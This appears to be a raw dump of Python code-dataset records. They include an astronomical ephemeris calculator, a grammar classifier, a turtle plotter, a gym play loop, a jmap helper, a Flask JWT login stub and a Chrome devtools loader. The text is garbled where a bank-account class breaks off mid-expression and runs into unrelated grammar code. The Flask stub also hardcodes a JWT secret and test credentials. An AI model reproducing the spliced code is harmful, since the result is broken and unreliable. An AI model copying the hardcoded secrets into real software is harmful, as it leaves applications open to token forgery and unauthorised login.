ΔT の値を取得し、インスタンス変数 delta_t\n に格納する。\n \"\"\"\n try:\n self.delta_t = self.DELTA_T[self.utc.year]\n except Exception as e:\n raise\n\n def __calc_tm(self):\n \"\"\" 計算用時刻引数 tm の計算\n * 次式により求め、インスタンス変数 tm, tm_r に格納する。\n (R 計算用は tm_r, その他は tm)\n tm = T + F + ΔT / 86400\n tm_r = T + F\n \"\"\"\n try:\n self.tm_r = self.t + self.f\n self.tm = self.tm_r + self.delta_t / 86400\n except Exception as e:\n raise\n\n def __calc(self):\n \"\"\" 各種計算\n * 各種値を計算し、インスタンス変数 vals に格納する。\n \"\"\"\n try:\n # 各種係数からの計算\n for div, vals in self.DIVS.items():\n a, b, coeffs = self.__get_coeffs(vals) # 
係数値等の取得\n t = self.tm_r if div == \"R\" else self.tm # 計算用時刻引数\n theta = self.__calc_theta(a, b, t) # θ の計算\n val = self.__calc_ft(theta, coeffs) # 所要値の計算\n if re.search(r\"(_RA|^R)$\", div) is not(None):\n while val >= 24.0:\n val -= 24.0\n while val <= 0.0:\n val += 24.0\n self.vals[div] = val\n # グリニジ時角の計算\n self.vals[\"SUN_H\" ] = self.__calc_h(self.vals[\"SUN_RA\" ])\n self.vals[\"MOON_H\"] = self.__calc_h(self.vals[\"MOON_RA\"])\n # 視半径の計算\n self.vals[\"SUN_SD\" ] = self.__calc_sd_sun()\n self.vals[\"MOON_SD\"] = self.__calc_sd_moon()\n # 視黄経・視黄緯の計算\n self.vals[\"SUN_LAMBDA\"] = self.__calc_lambda(\n self.vals[\"SUN_RA\"], self.vals[\"SUN_DEC\"]\n )\n self.vals[\"SUN_BETA\"] = self.__calc_beta(\n self.vals[\"SUN_RA\"], self.vals[\"SUN_DEC\"]\n )\n self.vals[\"MOON_LAMBDA\"] = self.__calc_lambda(\n self.vals[\"MOON_RA\"], self.vals[\"MOON_DEC\"]\n )\n self.vals[\"MOON_BETA\"] = self.__calc_beta(\n self.vals[\"MOON_RA\"], self.vals[\"MOON_DEC\"]\n )\n # 視黄経差(太陽 - 月)\n self.vals[\"LAMBDA_S_M\"] = self.__calc_lambda_sun_moon()\n except Exception as e:\n raise\n\n def __get_coeffs(self, vals):\n \"\"\" 係数等の取得\n * 引数の文字列の定数配列から a, b, 係数配列を取得する。\n\n :param list vals: 定数名\n :return list: [a, b, 係数配列]\n \"\"\"\n a, b = 0, 0\n coeffs = []\n try:\n for row in vals:\n if row[0] != self.utc.year:\n continue\n if row[1][0] <= int(self.tm) and int(self.tm) <= row[1][1]:\n a, b = row[1]\n coeffs = row[2]\n break\n return [a, b, coeffs]\n except Exception as e:\n raise\n\n def __calc_theta(self, a, b, t):\n \"\"\" θ の計算\n * θ を次式により計算する。\n θ = cos^(-1)((2 * t - (a + b)) / (b - a))\n 但し、0°<= θ <= 180°\n\n :param int a\n :param int b\n :param float t\n :return float theta: 単位: °\n \"\"\"\n try:\n if b < t: # 年末のΔT秒分も計算可能とするための応急処置\n b = t\n theta = (2 * t - (a + b)) / (b - a)\n theta = math.acos(theta) * 180 / math.pi\n return theta\n except Exception as e:\n raise\n\n def __calc_ft(self, theta, coeffs):\n \"\"\" 所要値の計算\n * θ, 係数配列から次式により所要値を計算する。\n f(t) = C_0 + C_1 * cos(θ) + C_2 * cos(2θ) + ... 
+ C_N * cos(Nθ)\n\n :param float theta: θ\n :param list coeffs: 係数配列\n :return float ft: 所要値\n \"\"\"\n ft = 0.0\n try:\n for i, c in enumerate(coeffs):\n ft += c * math.cos(theta * i * math.pi / 180)\n return ft\n except Exception as e:\n raise\n\n def __calc_h(self, ra):\n \"\"\" グリニジ時角の計算\n * 次式によりグリニジ時角を計算する。\n h = E + UT\n (但し、E = R - R.A.)\n\n :param float ra: R.A.\n :return float h: 単位 h\n \"\"\"\n try:\n e = self.vals[\"R\"] - ra\n h = e + self.f * 24\n return h\n except Exception as e:\n raise\n\n def __calc_sd_sun(self):\n \"\"\" 視半径(太陽)の計算\n * 次式により視半径を計算する。\n S.D.= 16.02 ′/ Dist.\n\n :return float sd: 単位 ′\n \"\"\"\n try:\n sd = 16.02 / self.vals[\"SUN_DIST\"]\n return sd\n except Exception as e:\n raise\n\n def __calc_sd_moon(self):\n \"\"\" 視半径(月)の計算\n * 次式により視半径を計算する。\n S.D.= sin^(-1) (0.2725 * sin(H.P.))\n\n :return float sd: 単位 ′\n \"\"\"\n try:\n sd = 0.2725 * math.sin(self.vals[\"MOON_HP\"] * math.pi / 180.0)\n sd = math.asin(sd) * 60.0 * 180.0 / math.pi\n return sd\n except Exception as e:\n raise\n\n def __calc_lambda(self, alpha, delta):\n \"\"\" 視黄経の計算\n * 次式により視黄経を計算する\n λ = arctan(sinδ sinε + cosδ sinα cosε / cosδ cosα)\n (α: 視赤経、δ: 視赤緯、 ε: 黄道傾斜角)\n\n :param float alpha: 視赤経, RA\n :param float delta: 視赤緯, DEC\n :return float lm: 視黄経\n \"\"\"\n try:\n alpha = alpha * 15 * math.pi / 180\n delta = delta * math.pi / 180\n eps = self.vals[\"EPS\"] * math.pi / 180\n lm_a = math.sin(delta) * math.sin(eps)\n lm_a += math.cos(delta) * math.sin(alpha) * math.cos(eps)\n lm_b = math.cos(delta) * math.cos(alpha)\n lm = math.atan2(lm_a, lm_b) * 180 / math.pi\n if lm < 0:\n lm += 360\n return lm\n except Exception as e:\n raise\n\n def __calc_beta(self, alpha, delta):\n \"\"\" 視黄緯の計算\n * 次式により視黄経を計算する\n β = arcsin(sinδ cosε − cosδ sinα sinε)\n (α: 視赤経、δ: 視赤緯、 ε: 黄道傾斜角)\n\n :param float alpha: 視赤経, RA\n :param float delta: 視赤緯, DEC\n :return float bt: 視黄緯\n \"\"\"\n try:\n alpha = alpha * 15 * math.pi / 180\n delta = delta * math.pi / 180\n eps = self.vals[\"EPS\"] * math.pi / 180\n bt = math.sin(delta) * math.cos(eps)\n bt -= math.cos(delta) * math.sin(alpha) * math.sin(eps)\n bt = math.asin(bt) * 180 / math.pi\n return bt\n except Exception as e:\n raise\n\n def __calc_lambda_sun_moon(self):\n \"\"\" 視黄経差(太陽 - 月)の計算\n * SUN_LAMBDA - MOON_LAMBDA\n\n :return float: 視黄経差(太陽 - 月)\n \"\"\"\n try:\n return self.vals[\"SUN_LAMBDA\"] - self.vals[\"MOON_LAMBDA\"]\n except Exception as e:\n raise\n\n def __display(self):\n \"\"\" 結果出力 \"\"\"\n try:\n s = (\n \"[ JST: {}, UTC: {} ]\\n\"\n \" SUN R.A. = {:12.8f} h (={:s})\\n\"\n \" SUN DEC. = {:12.8f} ° (={:s})\\n\"\n \" SUN DIST. = {:12.8f} AU\\n\"\n \" SUN hG. = {:12.8f} h (={:s})\\n\"\n \" SUN S.D. = {:12.8f} ′ (={:s})\\n\"\n \" MOON R.A. = {:12.8f} h (={:s})\\n\"\n \" MOON DEC. = {:12.8f} ° (={:s})\\n\"\n \" MOON H.P. = {:12.8f} ° (={:s})\\n\"\n \" MOON hG. = {:12.8f} h (={:s})\\n\"\n \" MOON S.D. = {:12.8f} ′ (={:s})\\n\"\n \" R = {:12.8f} h (={:s})\\n\"\n \" EPS. 
= {:12.8f} ° (={:s})\\n\"\n \" ---\\n\"\n \" SUN LAMBDA ={:13.8f} ° (={:s})\\n\"\n \" SUN BETA ={:13.8f} ° (={:s})\\n\"\n \" MOON LAMBDA ={:13.8f} ° (={:s})\\n\"\n \" MOON BETA ={:13.8f} ° (={:s})\\n\"\n \" DIFF LAMBDA ={:13.8f} °\"\n ).format(\n self.jst.strftime(\"%Y-%m-%d %H:%M:%S\"),\n self.utc.strftime(\"%Y-%m-%d %H:%M:%S\"),\n self.vals[\"SUN_RA\"],\n self.__hour2hms(self.vals[\"SUN_RA\"]),\n self.vals[\"SUN_DEC\"],\n self.__deg2dms(self.vals[\"SUN_DEC\"]),\n self.vals[\"SUN_DIST\"],\n self.vals[\"SUN_H\"],\n self.__hour2hms(self.vals[\"SUN_H\"]),\n self.vals[\"SUN_SD\"],\n self.__deg2dms(self.vals[\"SUN_SD\"] / 60),\n self.vals[\"MOON_RA\"],\n self.__hour2hms(self.vals[\"MOON_RA\"]),\n self.vals[\"MOON_DEC\"],\n self.__deg2dms(self.vals[\"MOON_DEC\"]),\n self.vals[\"MOON_HP\"],\n self.__deg2dms(self.vals[\"MOON_HP\"]),\n self.vals[\"MOON_H\"],\n self.__hour2hms(self.vals[\"MOON_H\"]),\n self.vals[\"MOON_SD\"],\n self.__deg2dms(self.vals[\"MOON_SD\"] / 60),\n self.vals[\"R\"],\n self.__hour2hms(self.vals[\"R\"]),\n self.vals[\"EPS\"],\n self.__deg2dms(self.vals[\"EPS\"]),\n self.vals[\"SUN_LAMBDA\"],\n self.__deg2dms(self.vals[\"SUN_LAMBDA\"]),\n self.vals[\"SUN_BETA\"],\n self.__deg2dms(self.vals[\"SUN_BETA\"]),\n self.vals[\"MOON_LAMBDA\"],\n self.__deg2dms(self.vals[\"MOON_LAMBDA\"]),\n self.vals[\"MOON_BETA\"],\n self.__deg2dms(self.vals[\"MOON_BETA\"]),\n self.vals[\"LAMBDA_S_M\"]\n )\n print(s)\n except Exception as e:\n raise\n\n def __hour2hms(self, hour):\n \"\"\" 99.999h -> 99h99m99s 変換\n\n :param float hour\n :return string: 99 h 99 m 99.999 s\n \"\"\"\n try:\n pm = \"-\" if hour < 0 else \" \"\n if hour < 0:\n hour *= -1\n h = int(hour)\n h_r = hour - h\n m = int(h_r * 60)\n m_r = h_r * 60 - m\n s = m_r * 60\n return \" {:>3s} h {:02d} m {:06.3f} s\".format(pm + str(h), m, s)\n except Exception as e:\n raise\n\n def __deg2dms(self, deg):\n \"\"\" 99.999° -> 99°99′99″ 変換\n\n :param float deg\n :return string: 99 ° 99 ′ 99.999 ″\n \"\"\"\n try:\n pm = \"-\" if deg < 0 else \" \"\n if deg < 0:\n deg *= -1\n d = int(deg)\n d_r = deg - d\n m = int(d_r * 60)\n m_r = d_r * 60 - m\n s = m_r * 60\n return \"{:>4s} ° {:02d} ′ {:06.3f} ″\".format(pm + str(d), m, s)\n except Exception as e:\n raise\n\n\nif __name__ == '__main__':\n try:\n obj = EphSunMoon()\n obj.exec()\n except Exception as e:\n traceback.print_exc()\n sys.exit(1)\n\n","sub_path":"ephemeris_jcg_i/eph_sun_moon_ecliptic.py","file_name":"eph_sun_moon_ecliptic.py","file_ext":"py","file_size_in_byte":16079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
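The heart of this almanac method is the pair `__calc_theta`/`__calc_ft`: each tabulated quantity is a cosine series in an angle θ that maps the table's validity interval [a, b] onto [0°, 180°]. A self-contained sketch of just that evaluation (the real coefficient tables live in the `consts` module, which is not part of this record, so the 3-term table below is hypothetical):

```python
import math

def calc_theta(a, b, t):
    # theta = acos((2t - (a + b)) / (b - a)), with 0 <= theta <= 180 degrees
    return math.degrees(math.acos((2 * t - (a + b)) / (b - a)))

def calc_ft(theta_deg, coeffs):
    # f(t) = C0 + C1*cos(theta) + C2*cos(2*theta) + ... + CN*cos(N*theta)
    return sum(c * math.cos(math.radians(i * theta_deg))
               for i, c in enumerate(coeffs))

# Hypothetical 3-term table valid for days 0..365 of a year:
print(calc_ft(calc_theta(0, 365, 100.5), [12.0, -3.5, 0.25]))
```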
+{"seq_id":"8357782","text":"class BankAccount:\n def __init__(self,number, aadhar, name, balance):\n self.__account_number=number\n self.__masked_aadhar=aadhar*4\n self.__name=name\n self.__balance=balance\n \n def deposite(self, money):\n if money<=0:\n print(\"Minimum of 1 rupees should be deposited\")\n return False\n else:\n self.__balance+=money\n return True\n\n def withdraw(self,money):\n if self.__balance')\n b[0] = b[0].strip(' ')\n b[1]=b[1].strip(' ')\n c=[]\n c=b[1].split('|')\n e=[]\n e.append(b[0])\n e.append(c)\n a.append(e)\nprint(a)\n\nf1=True# ГРЕЙБАХ\nf2=True# ХОМСКИЙ\nf3=True# ЛЕВО\nf4=True# ПРАВО\nf=True\n\nfor b in a:\n if (b[0].upper()==b[0]) & (len(b[0])==1):\n for c in b[1]:\n if (c.upper()==c) & (c!='E') & (f1|f3|f4) & f:# если только нетерминалы\n f1=f3=f4=False\n elif (c.lower()!=c) & (c!='E') & f:\n f2=False\n if (c[0]!=c[0].lower()):\n f1=False\n if len(c[1:])>0:\n if (c[1:]!=c[1:].upper()):\n f1=False\n\n k = 0\n for w in c:\n w1 = w.lower()\n if w != w1:\n k += 1\n if k > 1:\n f3 = f4 = False\n\n if f4 & (c[0]==c[0].upper()):\n f3=False\n if f3 & (c[len(c)-1]==c[len(c)-1].upper()):\n f4=False\n\n elif f & (c.lower()==c):\n if len(c)>1:\n f=False\n\n\n else:\n f=False\n\nif f:\n if f2:\n print(\"это нормальная форма Хомского\")\n elif f1:\n print(\"это нормальная форма Грейбах\")\n elif f3:\n print(\"это левая грамматика\")\n elif f4:\n print(\"это правая грамматика\")\n else:\n print(\"это просто кс грамматика\")\nelse:\n print(\"это не кс грамматика\")","sub_path":"3 задача.py","file_name":"3 задача.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"72807927","text":"# Allen, Sungmin, Yejun, Taiga\r\nimport turtle as trtl\r\n\r\nt = trtl.Turtle()\r\n\r\nt.speed(0)\r\n\r\n\r\n# The Slope and Y-intecept\r\nprint(\"This program Creates a linear line (only positive) Y = mx + b\")\r\nm = int(input(\"Enter a number for m : \"))\r\nb = int(input(\"Enter a number for b: \"))\r\n\r\n\r\n# coordanite plane\r\n\r\n\r\n # y hashmark\r\nt.pencolor(\"grey\")\r\nx = 0\r\ny_pos = -400\r\nwhile x < 85:\r\n t.penup()\r\n t.goto(-400,y_pos)\r\n t.pendown()\r\n t.forward(800)\r\n t.backward(800)\r\n y_pos += 10\r\n x += 1\r\n\r\n # y hashmark\r\nt.setheading(0)\r\nt.left(90)\r\ny = 0\r\nx_pos = -400\r\nwhile y < 81:\r\n t.penup()\r\n t.goto(x_pos,-400 )\r\n t.pendown()\r\n t.forward(800)\r\n t.backward(800)\r\n x_pos += 10\r\n y += 1\r\n \r\n # Y & X axis\r\nt.color(\"black\")\r\nt.pensize(3)\r\nt.penup()\r\nt.goto(0,0)\r\nt.setheading(0)\r\nt.pendown()\r\nt.forward(400)\r\nt.backward(800)\r\nt.goto(0,0)\r\nt.setheading(90)\r\nt.pendown\r\nt.forward(400)\r\nt.backward(800)\r\n\r\n# The line\r\n\r\nt.penup()\r\nt.goto(0,0)\r\n\r\nx_cor = 0\r\ny_cor = 0\r\n\r\n# b\r\nt.color(\"red\")\r\nt.setheading(0)\r\nt.penup()\r\nt.forward(b)\r\n\r\n# m\r\n\r\n #Line going up\r\nfor i in range(40):\r\n t.pendown()\r\n x_cor = m*i\r\n y_cor = x_cor + b\r\n t.goto(x_cor, y_cor)\r\n t.penup()\r\nt.pendown()\r\nt.left(45)\r\nt.shape(\"arrow\")\r\nt.stamp()\r\nt.penup()\r\nt.goto(0,b)\r\n\r\n\r\n #Line going down\r\nfor i in range(40):\r\n t.pendown()\r\n x_cor = m*i\r\n y_cor = x_cor + b\r\n t.goto(-(x_cor), -(y_cor))\r\n t.penup()\r\n\r\nt.pendown()\r\nt.setheading(270)\r\nt.right(45)\r\nt.stamp()\r\n\r\n\r\n\r\nwn = trtl.Screen()\r\nwn.mainloop()","sub_path":"linergraph.py","file_name":"linergraph.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"378336628","text":"\"\"\"A method to play gym environments using human IO inputs.\"\"\"\nimport os\nimport gym\nimport pygame\nfrom typing import Callable\n\n\ndef display_arr(screen, arr, video_size, transpose):\n arr_min, arr_max = arr.min(), arr.max()\n arr = 255.0 * (arr - arr_min) / (arr_max - arr_min)\n pyg_img = pygame.surfarray.make_surface(arr.swapaxes(0, 1) if transpose else arr)\n pyg_img = pygame.transform.scale(pyg_img, video_size)\n screen.blit(pyg_img, (0,0))\n\n\ndef play(env: gym.Env,\n transpose: bool=True,\n fps: int=30,\n callback: Callable=None,\n nop_: any=0,\n) -> None:\n \"\"\"Play the game using the keyboard as a human.\n\n Args:\n env: gym.Env\n Environment to use for playing.\n transpose: bool\n If True the output of observation is transposed.\n Defaults to true.\n fps: int\n Maximum number of steps of the environment to execute every second.\n Defaults to 30.\n callback: lambda or None\n Callback if a callback is provided it will be executed after\n every step. It takes the following input:\n obs_t: observation before performing action\n obs_tp1: observation after performing action\n action: action that was executed\n rew: reward that was received\n done: whether the environemnt is done or not\n info: debug info\n nop_: the object to use as a null op action for the environment\n\n Returns:\n None\n\n \"\"\"\n # type check the observation space\n obs_s = env.observation_space\n assert type(obs_s) == gym.spaces.box.Box\n assert len(obs_s.shape) == 2 or (len(obs_s.shape) == 3 and obs_s.shape[2] in [1,3])\n # get the mapping of keyboard keys to actions in the environment\n if hasattr(env, 'get_keys_to_action'):\n keys_to_action = env.get_keys_to_action()\n elif hasattr(env.unwrapped, 'get_keys_to_action'):\n keys_to_action = env.unwrapped.get_keys_to_action()\n else:\n raise ValueError('env has no get_keys_to_action method')\n relevant_keys = set(sum(map(list, keys_to_action.keys()),[]))\n # transpose the video is specified\n if transpose:\n video_size = env.observation_space.shape[1], env.observation_space.shape[0]\n else:\n video_size = env.observation_space.shape[0], env.observation_space.shape[1]\n\n pressed_keys = []\n running = True\n env_done = True\n # setup the screen using pygame\n screen = pygame.display.set_mode(video_size)\n pygame.display.set_caption(env.spec.id)\n # disable the SDL video driver so FCEUX wont open a window\n os.environ['SDL_VIDEODRIVER'] = 'dummy'\n clock = pygame.time.Clock()\n # start the main game loop\n while running:\n if env_done:\n env_done = False\n obs = env.reset()\n else:\n action = keys_to_action.get(tuple(sorted(pressed_keys)), nop_)\n prev_obs = obs\n obs, rew, env_done, info = env.step(action)\n if callback is not None:\n callback(prev_obs, obs, action, rew, env_done, info)\n if obs is not None:\n if len(obs.shape) == 2:\n obs = obs[:, :, None]\n if obs.shape[2] == 1:\n obs = obs.repeat(3, axis=2)\n display_arr(screen, obs, transpose=transpose, video_size=video_size)\n\n # process pygame events\n for event in pygame.event.get():\n # test events, set key states\n if event.type == pygame.KEYDOWN:\n if event.key in relevant_keys:\n pressed_keys.append(event.key)\n elif event.key == 27:\n running = False\n elif event.type == pygame.KEYUP:\n if event.key in relevant_keys:\n pressed_keys.remove(event.key)\n elif event.type == pygame.QUIT:\n running = False\n\n pygame.display.flip()\n clock.tick(fps)\n pygame.quit()\n\n\n# explicitly define the outward facing API of the module\n__all__ = 
[play.__name__]\n","sub_path":"gym_super_mario_bros/_human_play.py","file_name":"_human_play.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"540169654","text":"import subprocess\nfrom framework.utils.logger import logger\nfrom blessings import Terminal\nt = Terminal()\n\n\nclass JmapAction(object):\n\n def __init__(self, num, pid):\n\n self.num = num\n self.pid = pid\n\n def heap_dump(self):\n\n \"\"\"\n\n Perform heap dump on target PID\n\n \"\"\"\n\n try:\n for n in range(self.num):\n p = subprocess.Popen(\"jmap -dump:format=b,file=heap{0}.bin {1}\".format(str(n), self.pid), shell=True)\n p.wait()\n except subprocess.CalledProcessError:\n logger(\"warning\", \"Process error!\")\n logger(\"warning\", \"Make sure jmap is in your path\")\n except ValueError:\n logger(\"warning\", \"Argument error!\")","sub_path":"framework/aux/jmap.py","file_name":"jmap.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"70607721","text":"import os\nfrom flask import Flask, jsonify, request\nfrom config import DevConfig\nfrom flask_jwt_extended import (\n JWTManager, jwt_required, create_access_token,\n jwt_refresh_token_required, create_refresh_token,\n get_jwt_identity\n)\nfrom werkzeug.utils import secure_filename\n\n# 初始化 Flask 類別成為 instance\napp = Flask(__name__)\napp.config.from_object(DevConfig)\napp.config['JWT_SECRET_KEY'] = '047db533-4ea6-443d-9ecf-a44ae2d0b8fb' # 加密私鑰\njwt = JWTManager(app)\n\n# 測試用\n@app.route('/')\ndef index():\n return 'Hello World!'\n\n# 登入取得token\n@app.route('/login', methods=['POST'])\ndef login(): \n username = request.json.get('username', None) \n password = request.json.get('password', None) \n\n # 請在這邊實作登入機制,先以TEST做為測試帳密\n if username != 'test' or password != 'test': \n return jsonify({\"msg\": \"Bad username or password\"}), 401\n\n ret = {\n 'access_token': create_access_token(identity=username),\n 'refresh_token': create_refresh_token(identity=username)\n }\n return jsonify(ret), 200\n\n# 更新token\n@app.route('/refresh', methods=['POST'])\n@jwt_refresh_token_required\ndef refresh():\n current_user = get_jwt_identity()\n ret = {\n 'access_token': create_access_token(identity=current_user)\n }\n return jsonify(ret), 200\n\n# 測試token是否正確\n@app.route('/protected', methods=['GET'])\n@jwt_required\ndef protected():\n username = get_jwt_identity()\n return jsonify(logged_in_as=username), 200\n\n\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n# 承接人臉資訊\n@app.route('/facechk', methods=['POST'])\n@jwt_required\ndef upload_image():\n if 'file' not in request.files:\n resp = jsonify({'message' : 'No file part in the request'})\n resp.status_code = 400\n return resp\n file = request.files['file']\n if file.filename == '':\n resp = jsonify({'message' : 'No file selected for uploading'})\n resp.status_code = 400\n return resp\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n # 人臉辨識承接部份\n # file.save(....., filename))\n\n # 人臉辨識成功取得id\n if (1==2):\n resp = jsonify({'id' : filename})\n resp.status_code = 200\n # 辨識不到ID\n else:\n resp = jsonify({'message' : 'Can not found id!!'})\n resp.status_code = 404\n return resp\n else:\n resp = jsonify({'message' : 'Allowed file types are png, jpg, jpeg'})\n resp.status_code = 400\n return resp\n\n\n# 判斷自己執行非被當做引入的模組,因為 __name__ 這變數若被當做模組引入使用就不會是 __main__\nif __name__ == '__main__':\n app.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"58616822","text":"from functools import partial\nfrom uhttp.handlers import html, file\n\nfrom evernotebot.web.admin.api import (\n api_get_logs, api_retry_failed_update, api_login,\n api_send_broadcast_message, api_list_failed_updates\n)\n\n\nauthenticated_html = partial(html, auth_required=True, login_url=\"/login\")\njs_file = partial(file, content_type=\"text/javascript\")\ncss_file = partial(file, content_type=\"text/css\")\n\nurls = (\n # static\n (\"GET\", r\"^/evernotebot.js\", js_file(\"js/evernotebot.js\")),\n (\"GET\", r\"^/evernotebot.css\", css_file(\"css/evernotebot.css\")),\n # View\n (\"GET\", r\"^/login$\", html(\"login.html\")),\n (\"GET\", r\"^/$\", authenticated_html(\"dashboard.html\")),\n (\"GET\", r\"^/logs$\", authenticated_html(\"logs.html\")),\n (\"GET\", r\"^/retry$\", authenticated_html(\"retrying.html\")),\n # API\n (\"POST\", r\"^/api/login$\", api_login),\n (\"GET\", r\"^/api/logs$\", api_get_logs),\n (\"GET\", r\"^/api/failed_updates\", api_list_failed_updates),\n (\"POST\", r\"^/api/retry$\", api_retry_failed_update),\n (\"POST\", r\"^/api/broadcast$\", api_send_broadcast_message),\n)\n","sub_path":"evernotebot/web/admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"287238883","text":"import sys\n\nsys.setrecursionlimit(10 ** 6)\n\ndef solution(node, left, right):\n idx = right; root = node[left]\n for i in range(left + 1, right):\n if node[i] > root:\n idx = i\n break\n \n if idx > left + 1: solution(node, left + 1, idx)\n if idx < right: solution(node, idx, right)\n sys.stdout.write('%d\\n'%root)\n\nif __name__ == '__main__':\n node = []\n\n while True:\n try :\n node.append(int(sys.stdin.readline()))\n except :\n break\n \n solution(node, 0, len(node))","sub_path":"1~10000/5639/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"132300197","text":"# Copyright (c) 2017 crocoite contributors\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nChrome browser interactions.\n\"\"\"\n\nfrom urllib.parse import urlsplit\nfrom base64 import b64decode\nfrom collections import deque\nfrom threading import Event\nfrom http.server import BaseHTTPRequestHandler\nfrom .logger import Level\n\nimport pychrome\n\nclass Item:\n \"\"\"\n Simple wrapper containing Chrome request and response\n \"\"\"\n\n __slots__ = ('tab', 'chromeRequest', 'chromeResponse', 'chromeFinished',\n 'isRedirect', 'failed')\n\n def __init__ (self, tab):\n self.tab = tab\n self.chromeRequest = {}\n self.chromeResponse = {}\n self.chromeFinished = {}\n self.isRedirect = False\n self.failed = False\n\n def __repr__ (self):\n return '- '.format (self.url)\n\n @property\n def request (self):\n return self.chromeRequest.get ('request', {})\n\n @property\n def response (self):\n return self.chromeResponse.get ('response', {})\n\n @property\n def initiator (self):\n return self.chromeRequest['initiator']\n\n @property\n def id (self):\n return self.chromeRequest['requestId']\n\n @property\n def encodedDataLength (self):\n return self.chromeFinished['encodedDataLength']\n\n @property\n def url (self):\n return self.response.get ('url', self.request.get ('url'))\n\n @property\n def parsedUrl (self):\n return urlsplit (self.url)\n\n @property\n def body (self):\n \"\"\" Return response body or None \"\"\"\n try:\n body = self.tab.Network.getResponseBody (requestId=self.id, _timeout=10)\n rawBody = body['body']\n base64Encoded = body['base64Encoded']\n if base64Encoded:\n rawBody = b64decode (rawBody)\n else:\n rawBody = rawBody.encode ('utf8')\n return rawBody, base64Encoded\n except (pychrome.exceptions.CallMethodException, pychrome.exceptions.TimeoutException):\n raise ValueError ('Cannot fetch response body')\n\n @property\n def requestBody (self):\n \"\"\" Get request/POST body \"\"\"\n req = self.request\n postData = req.get ('postData')\n if postData:\n return postData.encode ('utf8'), False\n elif req.get ('hasPostData', False):\n try:\n postData = self.tab.Network.getRequestPostData (requestId=self.id, _timeout=10)['postData']\n return b64decode (postData), True\n except (pychrome.exceptions.CallMethodException, pychrome.exceptions.TimeoutException):\n raise ValueError ('Cannot fetch request body')\n return None, False\n\n @property\n def requestHeaders (self):\n # the response object may contain refined headers, which were\n 
# *actually* sent over the wire\n return self._unfoldHeaders (self.response.get ('requestHeaders', self.request['headers']))\n\n @property\n def responseHeaders (self):\n return self._unfoldHeaders (self.response['headers'])\n\n @property\n def statusText (self):\n text = self.response.get ('statusText')\n if text:\n return text\n text = BaseHTTPRequestHandler.responses.get (self.response['status'])\n if text:\n return text[0]\n return 'No status text available'\n\n @property\n def resourceType (self):\n return self.chromeResponse.get ('type', self.chromeRequest.get ('type', None))\n\n @staticmethod\n def _unfoldHeaders (headers):\n \"\"\"\n A host may send multiple headers using the same key, which Chrome folds\n into the same item. Separate those.\n \"\"\"\n items = []\n for k in headers.keys ():\n for v in headers[k].split ('\\n'):\n items.append ((k, v))\n return items\n\n def setRequest (self, req):\n self.chromeRequest = req\n\n def setResponse (self, resp):\n self.chromeResponse = resp\n\n def setFinished (self, finished):\n self.chromeFinished = finished\n\nclass BrowserCrashed (Exception):\n pass\n\nclass SiteLoader:\n \"\"\"\n Load site in Chrome and monitor network requests\n\n Chrome’s raw devtools events are preprocessed here (asynchronously, in a\n different thread, spawned by pychrome) and put into a deque. There\n are two reasons for this: First of all, it makes consumer exception\n handling alot easier (no need to propagate them to the main thread). And\n secondly, browser crashes must be handled before everything else, as they\n result in a loss of communication with the browser itself (i.e. we can’t\n fetch a resource’s body any more).\n\n XXX: track popup windows/new tabs and close them\n \"\"\"\n\n __slots__ = ('requests', 'browser', 'url', 'logger', 'queue', 'notify', 'tab')\n allowedSchemes = {'http', 'https'}\n\n def __init__ (self, browser, url, logger):\n self.requests = {}\n self.browser = pychrome.Browser (url=browser)\n self.url = url\n self.logger = logger.bind (context=type (self).__name__, url=url)\n self.queue = deque ()\n self.notify = Event ()\n\n def __enter__ (self):\n tab = self.tab = self.browser.new_tab()\n # setup callbacks\n tab.Network.requestWillBeSent = self._requestWillBeSent\n tab.Network.responseReceived = self._responseReceived\n tab.Network.loadingFinished = self._loadingFinished\n tab.Network.loadingFailed = self._loadingFailed\n tab.Log.entryAdded = self._entryAdded\n tab.Page.javascriptDialogOpening = self._javascriptDialogOpening\n tab.Inspector.targetCrashed = self._targetCrashed\n\n # start the tab\n tab.start()\n\n # enable events\n tab.Log.enable ()\n tab.Network.enable()\n tab.Page.enable ()\n 